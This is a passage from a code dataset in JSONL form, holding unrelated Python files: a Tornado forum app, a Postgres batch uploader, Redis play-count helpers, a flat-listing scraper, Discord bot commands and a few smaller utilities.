df.at[index[0], 'registration_state'] = False\n df.to_csv(self.file_path, index=False)\n\n def check_registration(self, the_uid):\n df = 
pd.read_csv(self.file_path)\n\n        index = df.index[df['card_uid'] == the_uid].tolist()\n\n        if len(index) != 0:\n            card_state = df.at[index[0], 'registration_state']\n        else:\n            card_state = False\n\n        return card_state\n\n\nif __name__ == '__main__':\n    rfid = RFIDNoHardware()\n","sub_path":"rfid/rfid_no_hardware.py","file_name":"rfid_no_hardware.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"431010782","text":"def Cantor():\r\n\tparameters = raw_input()\r\n\tk = int(parameters.split()[0])\r\n\tc = int(parameters.split()[1])\r\n\ts = int(parameters.split()[2])\r\n\tscheduledCleaning = \"\"\r\n\tif (k / c) <= s:\r\n\t\tsectionsToCheck = range(k)\r\n\t\tcurrentCheck = 0\r\n\t\twhile currentCheck < len(sectionsToCheck):\r\n\t\t\tspot = 1\r\n\t\t\tif currentCheck + c <= len(sectionsToCheck):\r\n\t\t\t\ttoDo = sectionsToCheck[currentCheck:currentCheck + c]\r\n\t\t\t\tcurrentCheck += c\r\n\t\t\telse:\r\n\t\t\t\ttoDo = sectionsToCheck[currentCheck:]\r\n\t\t\t\tcurrentCheck = len(sectionsToCheck)\r\n\r\n\t\t\tfor depth in reversed(range(len(toDo))):\r\n\t\t\t\tspot = spot + (k**depth) * toDo[depth]\r\n\t\t\tscheduledCleaning = scheduledCleaning + \" \" + str(spot)\r\n\t\treturn scheduledCleaning\r\n\r\n\telse:\r\n\t\treturn \"IMPOSSIBLE\"\r\n\r\ntimes = input()\r\n\r\nfor x in range(times):\r\n    print (\"Case #\" + str(x+1) + \":\" + str(Cantor()))","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_MuCephei_D.py","file_name":"16_0_4_MuCephei_D.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"345035319","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/lucio/Projects/django-custard/custard/custard/conf.py\n# Compiled at: 2015-04-01 03:54:55\nfrom __future__ import unicode_literals\nimport sys\nfrom django.conf import settings as django_settings\nfrom django.utils.functional import cached_property as settings_property\nif b'test' in sys.argv:\n    settings_property = property\nCUSTOM_TYPE_TEXT = b'text'\nCUSTOM_TYPE_INTEGER = b'integer'\nCUSTOM_TYPE_FLOAT = b'float'\nCUSTOM_TYPE_TIME = b'time'\nCUSTOM_TYPE_DATE = b'date'\nCUSTOM_TYPE_DATETIME = b'datetime'\nCUSTOM_TYPE_BOOLEAN = b'boolean'\n\nclass LazySettingsDict(object):\n\n    @settings_property\n    def CUSTOM_CONTENT_TYPES(self):\n        return getattr(django_settings, b'CUSTOM_CONTENT_TYPES', None)\n\n    @settings_property\n    def CUSTOM_FIELD_TYPES(self):\n        return dict({CUSTOM_TYPE_TEXT: b'django.forms.fields.CharField', \n            CUSTOM_TYPE_INTEGER: b'django.forms.fields.IntegerField', \n            CUSTOM_TYPE_FLOAT: b'django.forms.fields.FloatField', \n            CUSTOM_TYPE_TIME: b'django.forms.fields.TimeField', \n            CUSTOM_TYPE_DATE: b'django.forms.fields.DateField', \n            CUSTOM_TYPE_DATETIME: b'django.forms.fields.DateTimeField', \n            CUSTOM_TYPE_BOOLEAN: b'django.forms.fields.BooleanField'}, **getattr(django_settings, b'CUSTOM_FIELD_TYPES', {}))\n\n    @settings_property\n    def CUSTOM_WIDGET_TYPES(self):\n        return dict({CUSTOM_TYPE_TEXT: b'django.contrib.admin.widgets.AdminTextInputWidget', \n            CUSTOM_TYPE_INTEGER: b'django.contrib.admin.widgets.AdminIntegerFieldWidget', \n            CUSTOM_TYPE_FLOAT: b'django.contrib.admin.widgets.AdminIntegerFieldWidget', \n            CUSTOM_TYPE_TIME: b'django.contrib.admin.widgets.AdminTimeWidget', \n            CUSTOM_TYPE_DATE: b'django.contrib.admin.widgets.AdminDateWidget', \n            
CUSTOM_TYPE_DATETIME: b'django.contrib.admin.widgets.AdminSplitDateTime', \n CUSTOM_TYPE_BOOLEAN: b'django.forms.widgets.CheckboxInput'}, **getattr(django_settings, b'CUSTOM_WIDGET_TYPES', {}))\n\n\nsettings = LazySettingsDict()","sub_path":"pycfiles/django-custard-0.10.tar/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354188032","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Copyright 2012 F2E.im\n# Do have a faith in what you're doing.\n# Make your life a story worth telling.\n\n# cat /etc/mime.types\n# application/octet-stream crx\nfrom __future__ import print_function\nimport sys\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\nimport os.path\nimport memcache\nimport torndb\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nimport handler.base\nimport handler.user\nimport handler.topic\nimport handler.page\nimport handler.notification\n\nfrom tornado.options import options\nfrom lib.loader import Loader\nfrom lib.session import SessionManager\nfrom jinja2 import Environment, FileSystemLoader\nimport tcelery\n\nimport settings\n\ndb_default = settings.DATABASE['default']\n# define(\"port\", default=settings.http['port'], help=\"run on the given port\", type=int)\n# define(\"mysql_host\", default=db_default['host'], help=\"community database host\")\n# define(\"mysql_database\", default=db_default['db_name'], help=\"community database name\")\n# define(\"mysql_user\", default=db_default['user'], help=\"community database user\")\n# define(\"mysql_password\", default=db_default['password'], help=\"community database password\")\n\n\ntcelery.setup_nonblocking_producer()\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n app_settings = dict(\n blog_title=settings.site['title'],\n login_url=\"/login\",\n jinja2=Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), \"templates\")),\n trim_blocks=True),\n reserved=[\"user\", \"topic\", \"home\", \"setting\", \"forgot\", \"login\", \"logout\", \"register\", \"admin\"],\n )\n app_settings.update(settings.app_settings)\n\n handlers = [\n (r\"/\", handler.topic.IndexHandler),\n (r\"/t/(\\d+)\", handler.topic.ViewHandler),\n (r\"/t/create/(.*)\", handler.topic.CreateHandler),\n (r\"/t/edit/(.*)\", handler.topic.EditHandler),\n (r\"/reply/edit/(.*)\", handler.topic.ReplyEditHandler),\n (r\"/node/(.*)\", handler.topic.NodeTopicsHandler),\n (r\"/u/(.*)/topics\", handler.topic.UserTopicsHandler),\n (r\"/u/(.*)/replies\", handler.topic.UserRepliesHandler),\n (r\"/u/(.*)/favorites\", handler.topic.UserFavoritesHandler),\n (r\"/u/(.*)\", handler.topic.ProfileHandler),\n (r\"/vote\", handler.topic.VoteHandler),\n (r\"/favorite\", handler.topic.FavoriteHandler),\n (r\"/unfavorite\", handler.topic.CancelFavoriteHandler),\n (r\"/notifications\", handler.notification.ListHandler),\n (r\"/members\", handler.topic.MembersHandler),\n (r\"/setting\", handler.user.SettingHandler),\n (r\"/setting/avatar\", handler.user.SettingAvatarHandler),\n (r\"/setting/avatar/gravatar\", handler.user.SettingAvatarFromGravatarHandler),\n (r\"/setting/password\", handler.user.SettingPasswordHandler),\n (r\"/forgot\", handler.user.ForgotPasswordHandler),\n (r\"/login\", handler.user.LoginHandler),\n (r\"/logout\", handler.user.LogoutHandler),\n (r\"/register\", handler.user.RegisterHandler),\n\n (r'/admin/user$', handler.user.UserAdminHandler),\n 
(r'/admin/node$', handler.topic.NodeAdminHandler),\n (r'/admin/node/new$', handler.topic.NodeEditHandler),\n (r'/admin/node/(\\d+)$', handler.topic.NodeEditHandler),\n (r'/admin/plane$', handler.topic.PlaneAdminHandler),\n (r'/admin/plane/new$', handler.topic.PlaneEditHandler),\n (r'/admin/plane/(\\d+)$', handler.topic.PlaneEditHandler),\n\n (r'/resource/picture/upload_async', handler.page.PictureIframeUploadHandler),\n\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(sitemap.*$)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(bdsitemap\\.txt)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(.*)\", handler.topic.ProfileHandler),\n ]\n\n tornado.web.Application.__init__(self, handlers, **app_settings)\n\n # Have one global connection to the blog DB across all handlers\n self.db = torndb.Connection(\n host=db_default['host'], database=db_default['db_name'],\n user=db_default['user'], password=db_default['password']\n )\n\n # Have one global loader for loading models and handles\n self.loader = Loader(self.db)\n\n # Have one global model for db query\n self.user_model = self.loader.use(\"user.model\")\n self.topic_model = self.loader.use(\"topic.model\")\n self.reply_model = self.loader.use(\"reply.model\")\n self.plane_model = self.loader.use(\"plane.model\")\n self.node_model = self.loader.use(\"node.model\")\n self.notification_model = self.loader.use(\"notification.model\")\n self.vote_model = self.loader.use(\"vote.model\")\n self.favorite_model = self.loader.use(\"favorite.model\")\n self.picture_model = self.loader.use('picture.model')\n\n # Have one global session controller\n self.session_manager = SessionManager(app_settings[\"cookie_secret\"], settings.memcached, 0)\n\n # Have one global memcache controller\n self.mc = memcache.Client(settings.memcached)\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n port = settings.http['port']\n http_server.listen(port)\n print(\"http listen at http://localhost:%d\" % port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405376406","text":"#to import this enum, do:\n# from enum.card import CARD\n#This will allow you to do CARD.\n\nclass CARD:\n\tUTURN = 0\n\tROTATE_RIGHT = 1\n\tROTATE_LEFT = 2\n\tBACKUP = 3\n\tMOVE_1 = 4\n\tMOVE_2 = 5\n\tMOVE_3 = 6\n","sub_path":"enum/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326302817","text":"import math\nimport pickle\nfrom utils import *\n\nsaved = 'saved_transitions'\n\ndef initialize_counts():\n lookup_counts = {'':{}}\n\n # state is given by the last two characters of the string\n\n for c1 in alphabet:\n lookup_counts[''][''+c1] = 1.0\n for c1 in alphabet:\n lookup_counts[c1] = {}\n for c2 in alphabet:\n lookup_counts[c1][c1+c2] = 1.0\n for c1 in alphabet:\n for c2 in alphabet:\n lookup_counts[c1+c2] = {}\n for c3 in alphabet:\n lookup_counts[c1+c2][c2+c3] = 1.0\n \n return lookup_counts\n\n\ndef contribute_corpus(lookup_counts, s):\n\n corpus = prepare(s)\n\n # populate probabilities of each character\n\n for c in corpus:\n 
lookup_counts[''][''+c] += 1.0\n\n    #populate probabilities of each bigram\n\n    for i in range(len(corpus)-1):\n        lookup_counts[corpus[i]][corpus[i:i+2]] += 1.0\n\n    \n    #populate probabilities of trigrams\n    \n    for i in range(len(corpus)-2):\n        lookup_counts[corpus[i:i+2]][corpus[i+1:i+3]] += 1.0\n    \n    return lookup_counts\n\n\ndef normalize_transitions(lookup_counts):\n    # normalize unigram probabilities\n    running_sum = 0.0\n    for c1 in alphabet:\n        running_sum += lookup_counts[''][''+c1]\n    for c1 in alphabet:\n        lookup_counts[''][''+c1] = math.log(lookup_counts[''][''+c1] / running_sum)\n\n    # normalize bigrams\n    for c1 in alphabet:\n        running_sum = 0.0\n        for c2 in alphabet:\n            running_sum += lookup_counts[c1][c1+c2]\n        for c2 in alphabet:\n            lookup_counts[c1][c1+c2] = math.log(lookup_counts[c1][c1+c2] / running_sum)\n    \n    # normalize trigrams\n    \n    for c1 in alphabet:\n        for c2 in alphabet:\n            running_sum = 0.0\n            for c3 in alphabet:\n                running_sum += lookup_counts[c1+c2][c2+c3]\n            for c3 in alphabet:\n                lookup_counts[c1+c2][c2+c3] = math.log(lookup_counts[c1+c2][c2+c3]/ running_sum)\n    \n    return lookup_counts\n\n\ndef import_corpus(f):\n    fin = open(f, 'r')\n\n    transitions = initialize_counts()\n    for line in fin:\n        contribute_corpus(transitions, line)\n    \n    normalize_transitions(transitions)\n    return transitions\n\n\n\ndef score2(s, transitions):\n    text = prepare(s)\n    \n    score = 0.0\n    if len(text) < 1:\n        return score\n    state = ''\n    score += transitions[state][state + text[0]]\n    if len(text) < 2:\n        return score\n    state = text[0]\n    score += transitions[state][state + text[1]]\n    if len(text) < 3:\n        return score\n    state = text[:2]\n\n    for i in range(2, len(text)):\n        score += transitions[state][(state+text[i])[1:]] \n        state = (state+text[i])[1:]\n    \n    return score - math.log(1.0/len(alphabet)) * len(text)\n\n\n\nfin = open(saved, 'rb')  # pickle files must be opened in binary mode\nq = pickle.load(fin)\nfin.close()\n\ndef score(s):\n    return score2(s,q)\n","sub_path":"scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"494298069","text":"from io import StringIO\nfrom functools import reduce\nimport psycopg2 as psyco # pg driver\nimport psycopg2.extras\nfrom ..helpers.exceptions import NoBatchTypeException\nfrom ..helpers.pointmodel import Point_Model\n\n\nclass Uploader:\n    \"\"\"\n    The base class for other uploaders. The subclasses should essentially just implement the\n    specific parser. This class initializes the point model and interacts with the database.\n    \"\"\"\n\n    def __init__(self, dsn_string, batch_type_name):\n        \"\"\"\n        initializes values and point_model\n        :input:\n            - dsn_string\n            - the name of the batch_type the point_model is to be based on\n            (should match the name of a type in the database)\n        \"\"\"\n\n        self.dsn_string = dsn_string\n        self.batch_type_name = batch_type_name\n        self.points = []\n        self.set_ref_table_and_fields()\n\n    def upload(self, file_ids):\n        \"\"\"\n        Makes a new batch and uploads all of the points. 
Also connects files to the batch.\n        Returns the new batch_id\n        :input: a list of file_ids used in the batch\n        :output: int - id of batch\n        \"\"\"\n\n        conn = psyco.connect(dsn=self.dsn_string)\n        cur = conn.cursor()\n\n        batch_id = self.insert_batch(cur)\n        self.link_files_to_batch(cur, batch_id, file_ids)\n\n        copy_file, header = self.make_csv(batch_id)\n        cur.copy_from(copy_file, self.ref_table, columns=header)\n\n        conn.commit()\n        cur.close()\n        conn.close()\n\n        return batch_id\n\n    def parse_file(self, file):\n        \"\"\"\n        Takes a file and makes corresponding points and then gets the ranges of time and lat/lon.\n        The parsing should be done in the subclasses and then super() should be used\n        \"\"\"\n\n        self.set_time_range_and_bbox()\n\n    def insert_batch(self, cur):\n        \"\"\"\n        Inserts a new batch into the database, returns batch_id. Can only be run after parsing.\n        :input: cursor\n        \"\"\"\n\n        bbox_string = \"ST_GeomFromText('POLYGON(({min_lon} {min_lat},{max_lon} {min_lat},{max_lon} {max_lat},{min_lon} {max_lat}, {min_lon} {min_lat}))', 4326)\"\n        bbox_string = bbox_string.format(min_lon=self.min_lon,max_lon=self.max_lon,min_lat=self.min_lat,max_lat=self.max_lat)\n\n        insert_batch_string = \"\"\"\n            INSERT INTO Batches (start_time, end_time, batch_type_id, bbox)\n            VALUES (%s, %s, %s, {}) RETURNING id;\n        \"\"\".format(bbox_string)\n\n        cur.execute(insert_batch_string, [self.start_time, self.end_time, self.batch_type_id])\n        batch_id = cur.fetchone()[0]\n        return batch_id\n\n\n    def add_point(self, point):\n        \"\"\"\n        Stores the point, also validates\n        :input: a point dict\n        \"\"\"\n        if self.point_model.validate(point):\n            self.points.append(point)\n\n    def link_files_to_batch(self, cur, batch_id, file_ids):\n        \"\"\"\n        adds (batch_id, file_id) to batch_files for every file_id in file_ids\n        :input: cursor, batch_id, iterable of file ids\n        \"\"\"\n        insert_tuples = map(lambda x: (batch_id, x), file_ids)\n        insert_string = \"INSERT INTO Batch_Files (batch_id, file_id) VALUES %s\"\n        psycopg2.extras.execute_values(cur, insert_string, insert_tuples)\n\n    def set_ref_table_and_fields(self):\n        \"\"\"\n        using the batch_type_name, set the ref_table and point_model based on the database\n        \"\"\"\n        conn = psyco.connect(dsn=self.dsn_string)\n        cur = conn.cursor()\n\n        cur.execute('SELECT id, ref_table from batch_types where name = %s', (self.batch_type_name,))\n\n        result = cur.fetchone()\n        if result is None:\n            raise NoBatchTypeException(\"There is no batch type with name '%s'\" % self.batch_type_name)\n        self.batch_type_id, self.ref_table = result\n\n        cur.execute('SELECT field_name, field_type from batch_type_fields f, batch_types b where b.id = %s and b.id = f.batch_type_id', (self.batch_type_id,))\n        fields = cur.fetchall()\n        self.point_model = Point_Model(fields)\n\n        conn.commit()\n        cur.close()\n        conn.close()\n\n    def set_time_range_and_bbox(self):\n        \"\"\"\n        Runs through all the points and finds the min and max of time, latitude and longitude\n        Adds those vars to self. 
min_lon, max_lat, min_time, etc\n        \"\"\"\n        def update_ranges(current, new):\n            for key in current:\n                val = current[key]\n                if val is None:\n                    current[key] = [new[key], new[key]]\n                else:\n                    current[key] = [min(current[key][0], new[key]), max(current[key][1], new[key])]\n            return current\n\n        ranges = { 'time':None, 'latitude':None, 'longitude':None }\n        extremes = reduce(update_ranges, self.points, ranges)\n\n        self.start_time, self.end_time = extremes['time']\n        self.min_lat, self.max_lat = extremes['latitude']\n        self.min_lon, self.max_lon = extremes['longitude']\n\n    def make_csv(self, batch_id):\n        \"\"\"\n        Makes a file-like object in tab-delimited CSV format without headers.\n        Every point gets turned into a line.\n        Returns a StringIO object and a list of strings representing the header.\n        Any tabs in the values are replaced with spaces.\n        :input: the batch_id\n        :output: StringIO object in csv format, list of strings for header\n        \"\"\"\n        fields = list(self.point_model.model)\n\n        # remove all the fields that start with 'pr_' from points\n        trimmed_points = map(lambda p: {f:p[f] for f in p if not f.startswith('pr_')}, self.points)\n\n        copy_file = StringIO()\n        for p in trimmed_points:\n            # makes the line replacing any existing \\t with spaces\n            s = '\\t'.join([str(p[f]).replace('\\t', ' ') for f in fields] + [str(batch_id)])\n            print(s, file=copy_file)\n\n        copy_file.seek(0)\n\n        header = fields + ['batch_id']\n\n        return copy_file, header\n","sub_path":"dbinterfacer/uploaders/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"480106700","text":"try:\n    import cupy as cp\nexcept ModuleNotFoundError:\n    cp = None\n\nfrom analysis.config import get_analysis_config\n\ndef get_class_from_frame(frame):\n    try:\n        class_name = frame.f_locals[\"self\"].__class__.__name__\n    except KeyError:\n        class_name = \"Err: not an object\"\n    return class_name\n\n\ndef get_object_wrapper_name(frame, event, args) -> str:\n    return get_class_from_frame(frame)\n\n\ndef get_stencil_name(frame, event, args) -> str:\n    \"\"\"Get the name of the stencil from within a\n    call to FrozenStencil.__call__\"\"\"\n    name = getattr(\n        frame.f_locals[\"self\"].stencil_object,\n        \"__name__\",\n        repr(frame.f_locals[\"self\"].stencil_object.options[\"name\"]),\n    )\n    return f\"{name}.__call__\"\n\n\ndef get_name_from_frame(frame, event, args) -> str:\n    \"\"\"Static name from frame object\"\"\"\n    return frame.f_code.co_name\n\n\n\"\"\" Dictionary of functions to retrieve the name of a marker\nfollowing different logic.\n\"\"\"\nname_op = {\n    \"gt4py_stencil\": get_stencil_name,\n    \"function\": get_name_from_frame,\n    \"wrapper\": get_object_wrapper_name,\n}\n\n\ndef mark(frame, event, args):\n    \"\"\"Hooks at each function call & exit to record a Mark.\"\"\"\n    config = get_analysis_config()\n    if event == \"call\":\n        for fn_desc in config[\"nvtx_marks\"]:\n            key = fn_desc[\"key\"]\n            if frame.f_code.co_name == key[\"fn\"] and (\n                key[\"file\"] is None or key[\"file\"] in frame.f_code.co_filename\n            ):\n                if \"name\" in fn_desc:\n                    name = fn_desc[\"name\"]\n                elif \"name_op\" in fn_desc:\n                    name = name_op[fn_desc[\"name_op\"]](frame, event, args)\n                else:\n                    raise RuntimeError(\"Unrecognized name operator\")\n                cp.cuda.nvtx.RangePush(name)\n    elif event == \"return\":\n        for fn_desc in config[\"nvtx_marks\"]:\n            key = fn_desc[\"key\"]\n            if frame.f_code.co_name == key[\"fn\"] and (\n                
key[\"file\"] is None or key[\"file\"] in frame.f_code.co_filename\n ):\n cp.cuda.nvtx.RangePop()\n","sub_path":"analysis/tools/nvtx_markings.py","file_name":"nvtx_markings.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457877481","text":"import redis\nimport time\nimport json\n\nrs=redis.Redis(host='127.0.0.1', port=6379, db=0, decode_responses=True)\ncount=redis.Redis(host='127.0.0.1', port=6379, db=1, decode_responses=True)\n\n#验证key是否重复\ndef auth_key(uid):\n if rs.get(uid):\n return False\n else:\n return True\n\n#写入播放记录\ndef write_playrecording(ip, video_id):\n gid = ip + '-' + time.strftime(\"%H%M%S\", time.localtime())\n if auth_key(gid):\n jsonlist = {\n \"ip\":ip,\n \"vid\":video_id\n }\n jsonlist = json.dumps(jsonlist)\n rs.set(gid,jsonlist)\n\n#写入数据库\ndef write_db():\n redis_data = rs.keys()\n for i in data:\n print('写入数据',i)\n\n#获取全部数据\ndef get_alldata():\n data = rs.keys()\n alist = []\n for i in data:\n data = rs.get(i)\n jsondata = {\"key\":i,\"data\":data}\n alist.append(jsondata)\n return alist\n\ndef deldata(tab,key):\n if tab == 'rs':\n rs.delete(key)\n elif tab == 'count':\n count.delete(key)\n else:\n return EOFError\n\n#删除全部数据\ndef delalldata():\n data = rs.keys()\n for i in data:\n rs.delete(i)\n return True\n\ndef video_playcount(vid):\n #获取vid的数据\n viddata = count.get(vid)\n #查询vid是否存在\n if viddata:\n count.getset(vid, viddata + 1)\n else:\n count.set(vid, 1)\n\ndef video_playcount_getall():\n data = count.keys()\n alist = []\n for i in data:\n data = count.get(i)\n jsondata = {\"vid\":i,\"count\":data}\n alist.append(jsondata)\n return alist","sub_path":"app/redis_db/rediscf.py","file_name":"rediscf.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39627048","text":"from django.conf.urls import url\nfrom tracking.views import index, device, device_csv, get_vehicles, export_stop_start_points\n\n\nurlpatterns = [\n url(r'^$', index, name='tracking_index'),\n url(r'^device/(?P\\d+)$', device, name='tracking_device'),\n url(r'^devices\\.csv$', device_csv, name='tracking_device_csv'),\n url(r'^stop_start_points$', export_stop_start_points, name='stop_start_points_csv'),\n url(r'vehicle_data/', get_vehicles, name='get_fleet_vehicles'),\n]\n","sub_path":"tracking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531621455","text":"from ..core import *\r\nfrom ..vparsers import *\r\nfrom ..utils import *\r\n\r\n\r\nclass SupernovaStatusParser(ValueParser):\r\n \r\n def parse(self, value):\r\n return {\r\n \"status--avilable\": StatusParser.AVAILABLE,\r\n \"status--reserved\": StatusParser.RESERVED,\r\n \"status--sold\": StatusParser.SOLD\r\n }.get(value, None)\r\n \r\n\r\nclass BuildingParser(ValueParser):\r\n\r\n @indexerror_wrapper(return_value=None)\r\n def parse(self, text):\r\n return text.split(\" \")[-1]\r\n\r\n\r\nclass SupernovaParser(\r\n MultipleRequestsGeneratorMixin, MultipleSourcesMixin, \r\n MultipleRequestsLoaderMixin, BaseParser\r\n):\r\n url = \"https://lema15.pl/wp-content/themes/supernova/page-templates/AJAX.php\"\r\n method = \"POST\"\r\n fixed_data = { \"fn\": \"getPage\" }\r\n var_data = [ dict(number=i) for i in range(1, 9) ]\r\n middlewares = [ JSONMiddleware() ]\r\n parsers = {\r\n \"floor\": FloorParser(), \"price\": 
PriceParser(), \"area\": AreaParser(),\r\n \"int\": IntParser(), \"building\": BuildingParser()\r\n }\r\n \r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.filter_flats()\r\n\r\n def filter_flats(self):\r\n buildings = getattr(self, \"buildings\", None)\r\n if buildings is not None:\r\n records = [\r\n record for record in self.records\r\n if record[\"building\"] in buildings\r\n ]\r\n self.records = records\r\n\r\n def find_records(self, data):\r\n return data\r\n \r\n def parse_record(self, data):\r\n return {\r\n \"number\": data.get(\"number\", None),\r\n \"building\": self.parsers[\"building\"](data.get(\"stage_title\", None)),\r\n \"price\": self.parsers[\"price\"](data.get(\"total_brutto\", None)),\r\n \"area\": self.parsers[\"area\"](data.get(\"area\", None)),\r\n \"rooms\": self.parsers[\"int\"](data.get(\"rooms\", None)),\r\n \"floor\": self.parsers[\"floor\"](data.get(\"flight\", None)),\r\n \"status\": SupernovaStatusParser()(data.get(\"id_product_status\", {}).get(\"class\", None))\r\n }\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = \"{building}/{number}\".format(**record)\r\n record[\"plan\"] = \"https://lema15.pl/mieszkanie/{number}\".format(**record)\r\n return record\r\n\r\n\r\nclass SupernovaABEParser(SupernovaParser):\r\n buildings = [\"AB\", \"E\", \"D\"]","sub_path":"parsers/cordia/supernova.py","file_name":"supernova.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23259621","text":"import datetime\nfrom discord.ext import commands\nimport discord\nimport platform\n\n\nfrom base_folder.bot.utils.util_functions import success_embed, build_embed\nfrom base_folder.bot.utils.Permissions_checks import user, mod\nfrom base_folder.bot.utils.checks import check_args_datatyp, logging_to_channel_stdout, purge_command_in_channel\n\n\nclass UserCmds(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(pass_context=True, name=\"profile\", brief=\"Your Profile\", usage=\"profile\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def profile(self, ctx):\n xp = await self.client.sql.get_text_xp(ctx.guild.id, ctx.author.id)\n lvl = await self.client.sql.get_lvl_text(ctx.guild.id, ctx.author.id)\n warnings = await self.client.sql.get_warns(ctx.guild.id, ctx.author.id)\n e = build_embed(\n author=ctx.author.display_name,\n author_img=ctx.author.avatar_url,\n timestamp=datetime.datetime.now(),\n footer=self.client.user.name\n )\n e.title = \"Your profile\"\n e.description = ctx.author.mention\n e.add_field(name=\"Writer rank\", value=f\"**#{lvl}** with {xp}/{int((lvl+1)**(1/float(1/4)))}XP\", inline=False)\n e.add_field(name=\"Warnings\", value=f\"You have {warnings} warning(s)!\")\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name=\"server_info\", brief=\"Guild info\", usage=\"server_info\")\n @commands.guild_only()\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def server_info(self, ctx):\n e = build_embed(title=ctx.guild.name,\n author=self.client.user.name,\n author_img=self.client.user.avatar_url,\n thumbnail=ctx.guild.icon_url,\n description=\"Here are some infos about this guild\",\n timestamp=datetime.datetime.now()\n\n )\n e.add_field(name=\"Members\", value=ctx.guild.member_count)\n e.add_field(name=\"Owner\", value=ctx.guild.owner)\n 
e.add_field(name=\"Roles\", value=len(ctx.guild.roles))\n e.add_field(name=\"Created at\", value=ctx.guild.created_at)\n e.add_field(name=\"AFK channel\", value=ctx.guild.afk_channel)\n e.add_field(name=\"AFK timeout\", value=ctx.guild.afk_timeout)\n e.add_field(name=\"Emoji limit\", value=ctx.guild.emoji_limit)\n e.add_field(name=\"Bitrate limit\", value=ctx.guild.bitrate_limit)\n e.add_field(name=\"Filesize limit\", value=ctx.guild.filesize_limit)\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name=\"leaderboard\", brief=\"Shows the leaderboard for text xp\",\n usage=\"leaderboard\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def leaderboard(self, ctx):\n lvl = []\n xp = []\n userlist = []\n ranks = await self.client.sql.leaderboard(ctx.guild.id)\n for user in ranks:\n userlist.append(user[2])\n lvl.append(user[1])\n xp.append(user[0])\n embed = discord.Embed(\n colour=ctx.author.colour,\n timestamp=datetime.datetime.utcnow()\n )\n embed.set_author(name=\"Leaderboard for the server\")\n embed.set_footer(text=f\"Requested by {ctx.author.display_name}\", icon_url=ctx.author.avatar_url)\n for index, u in enumerate(zip(userlist, lvl, xp), start=1):\n embed.add_field(\n name=f\"Rank {index} \",\n value=f\"User:\\t** <@{ u[0]}> **\\n Level:{str(u[1])} xp:{str(u[2])}\",\n inline=False\n )\n await ctx.send(embed=embed)\n\n @commands.command(pass_context=True, name=\"roleinfo\",\n brief=\"Info about a role\", usage=\"roleinfo @role\")\n @commands.guild_only()\n @mod()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def roleinfo(self, ctx, role: discord.Role = None):\n counter = 0\n for members in self.client.get_all_members():\n for i in members.roles:\n if role == i:\n counter += 1\n e = success_embed(self.client)\n e.description=f\"Here are some important info's about {role.mention}\"\n e.add_field(name=\"Members\", value=f\"Has {counter} members\", inline=True)\n e.add_field(name=\"Created at\", value=f\"Was created at \\n{role.created_at}\", inline=True)\n e.add_field(name=\"Color\", value=f\"Has this {role.color} color\", inline=True)\n e.add_field(name=\"Permissions\", value=f\"Shown as integers \\n{role.permissions}\", inline=True)\n e.add_field(name=\"Shown on the right\", value=f\"{role.hoist}\", inline=True)\n e.add_field(name=\"Is mentionable\", value=f\"{role.mentionable}\", inline=True)\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name='stats', brief='Sends some bot stats', usage=\"stats\")\n @user()\n @check_args_datatyp\n 